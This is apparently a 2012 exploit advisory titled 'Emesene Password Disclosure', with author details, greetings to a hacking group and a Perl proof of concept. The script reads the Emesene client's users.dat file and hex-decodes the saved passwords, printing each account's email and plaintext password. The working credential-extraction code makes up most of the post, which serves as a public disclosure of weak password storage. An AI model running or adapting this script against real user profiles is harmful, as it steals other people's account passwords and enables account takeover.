Emesene 2.12.5 Password Disclosure

`# Exploit Title: Emesene Password Disclosure  
# Category: Local  
# Date: 29/06/2012  
# Author: Daniel Godoy  
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com  
# Author Web: www.delincuentedigital.com.ar  
# Sofware web: http://blog.emesene.org/p/downloads.html  
# Tested on: Linux  
  
The only requirement to run the script is that the customer is  
highlighted remember password.  
  
[Comment]  
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,  
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,  
InyeXion, ksha, zerial,LinuxFer, Scorp  
her0, r0dr1 y demas user de RemoteExecution  
www.remoteexecution.info www.remoteexcution.com.ar  
#RemoteExecution Hacking Group  
  
[PoC]  
  
#!/usr/bin/perl  
#/home/$HOME/.config/emesene1.0  
system("clear");  
print "[ EMESENE PASSWORD DISCLOSURE ]\n";  
print "TESTED ON UBUNTU 10.04 LTS\n";  
my $pwn="users.dat";  
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";  
$cantidad++ while <ENTRADA>;  
close (ENTRADA);  
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";  
@source = <ENTRADA>;  
for($i = 0; $i < $cantidad; $i++)  
{  
@password= split(":", $source[$i]);  
print "Mail: ".$password[0]." Password PWND! => ";  
print pack("H*", $password[1]), "\n";   
}  
close (ENTRADA);  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
  
`